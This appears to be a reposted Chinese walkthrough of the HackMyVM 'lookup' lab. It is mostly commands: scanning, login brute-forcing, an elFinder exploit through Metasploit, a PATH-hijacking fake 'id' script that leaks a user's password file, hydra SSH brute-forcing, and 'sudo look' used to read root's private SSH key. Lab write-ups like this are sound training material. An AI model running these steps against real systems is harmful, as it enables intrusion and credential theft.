当前位置: 首页 > article >正文

hackmyvm-lookup

arp-scan -l

nmap -sS -v 192.168.222.209

gobuster dir -u http://192.168.222.209 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -b 301,401,403,404

发现了一处dns解析,在/etc/hosts中添加

192.168.222.209 lookup.hmv

发现可以访问,是一处登录框

gobuster dir -u http://lookup.hmv -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -b 301,401,403,404

漏洞发现

whatweb http://lookup.hmv

抓包,爆破

得到:username=jose&password=password123

跳转到http://files.lookup.hmv/,在hosts中添加这个域名

是一个elfinder 管理器

得到版本信息v2.1.47

msfconsole

set RHOSTS files.lookup.hmv

运行,进入shell环境(shell -t)

搜索具备SUID权限的程序

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} ;

find / -user root -perm -4000 -print 2>/dev/null

我们需要关注/usr/sbin/pwm,它正试图执行id命令来提取用户名和用户id。出现问题是因为它找不到.passwords文件,因为它位于“think”用户的主目录中,并且路径不同。

/usr/bin/script -qc /bin/bash /dev/null:启动一个新的 Bash shell

#!/bin/bash

echo "uid=33(think) gid=33(think) groups=33(think)"

开启http服务将id文件传进去

伪造id

PATH=/tmp:$PATH

chmod +x id

运行/usr/sbin/pwm

可以看到我们已经拿到/home/think/.password的内容

将跑出来的内容保存到本地pass.txt

hydra -l think -P pass.txt ssh://192.168.222.209 -V -I

ssh think@192.168.222.209

登录成功

sudo -l

sudo look '' /root/.ssh/id_rsa

将私钥完整粘贴到本地文件id中

使用 ​chmod​ 命令将私钥文件的权限设置为 ​600:

chmod 600 id

验证权限是否已更改:

ls -l id

连接root用户的ssh

ssh root@192.168.222.209 -i id


http://www.kler.cn/a/598019.html

相关文章:

  • 数组,指针 易混题解析(二)
  • golang Error的一些坑
  • 唯品会商品详情页架构设计与实现:高并发场景下的技术实践‌
  • 乘法逆元(快速幂,费马小定理)
  • 常见前端安全问题及解决方案
  • PyJSON5:高效、安全的JSON5处理库
  • Linux-数据结构-哈夫曼树-哈希表-内核链表
  • 【STL】string类
  • 死锁:当程序 “卡住“ 时,发生了什么?
  • wordpress主题使用中常见错误汇总
  • OpenGL实现摄像机(根据鼠标位置放大缩小视图)
  • How to install visual studio code on Linux mint 22
  • 详解内联容器标签<span>的用法
  • 幻影星空亮相CAAPA北京展 引领文旅产业升级转型
  • uniapp从 vue2 项目迁移到 vue3流程
  • 【网络层协议】NAT技术内网穿透
  • 【实战】deepseek数据分类用户评论数据
  • ADC噪声全面分析 -04- 有效噪声带宽简介
  • Tomcat常见漏洞攻略
  • 分布式系统设计陷阱,白话CAP理论